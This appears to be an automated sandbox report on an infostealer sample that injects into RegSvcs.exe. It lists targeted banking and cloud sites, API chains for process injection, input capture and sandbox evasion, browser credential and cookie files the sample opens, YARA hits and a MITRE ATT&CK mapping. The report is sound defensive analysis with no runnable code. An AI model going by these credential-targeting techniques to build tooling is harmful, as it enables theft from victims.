                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4484266848.000000000141A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: RegSvcs.exe, 00000002.00000002.4487012044.0000000004630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeAPI call chain: ExitProcess graph end nodegraph_0-98323
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FF41FD BlockInput,0_2_00FF41FD
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F83B4C
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FB5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FB5CCC
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FFC304 LoadLibraryA,GetProcAddress,0_2_00FFC304
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F534E0 mov eax, dword ptr fs:[00000030h]0_2_00F534E0
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F53540 mov eax, dword ptr fs:[00000030h]0_2_00F53540
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F51E70 mov eax, dword ptr fs:[00000030h]0_2_00F51E70
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FD81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FD81F7
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FAA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FAA395
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FAA364 SetUnhandledExceptionFilter,0_2_00FAA364
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1110008Jump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FD8C93 LogonUserW,0_2_00FD8C93
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F83B4C
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F84A35
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE4EF5 mouse_event,0_2_00FE4EF5
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\W2k2NLSvja.exe"Jump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FD81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FD81F7
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00FE4C03
                Source: W2k2NLSvja.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: W2k2NLSvja.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FA886B cpuid 0_2_00FA886B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FB50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FB50D7
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FC2230 GetUserNameW,0_2_00FC2230
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FB418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FB418A
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F84AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: W2k2NLSvja.exe PID: 5700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6504, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: W2k2NLSvja.exe PID: 5700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6504, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: W2k2NLSvja.exeBinary or memory string: WIN_81
                Source: W2k2NLSvja.exeBinary or memory string: WIN_XP
                Source: W2k2NLSvja.exeBinary or memory string: WIN_XPe
                Source: W2k2NLSvja.exeBinary or memory string: WIN_VISTA
                Source: W2k2NLSvja.exeBinary or memory string: WIN_7
                Source: W2k2NLSvja.exeBinary or memory string: WIN_8
                Source: W2k2NLSvja.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: W2k2NLSvja.exe PID: 5700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6504, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: W2k2NLSvja.exe PID: 5700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6504, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: W2k2NLSvja.exe PID: 5700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6504, type: MEMORYSTR
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FF6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00FF6596
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FF6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00FF6A5A
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                4
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager1
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS127
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                2
                Valid Accounts
                LSA Secrets131
                Security Software Discovery
                SSH3
                Clipboard Data
                3
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Virtualization/Sandbox Evasion
                Cached Domain Credentials11
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture24
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                Access Token Manipulation
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                W2k2NLSvja.exe71%VirustotalBrowse
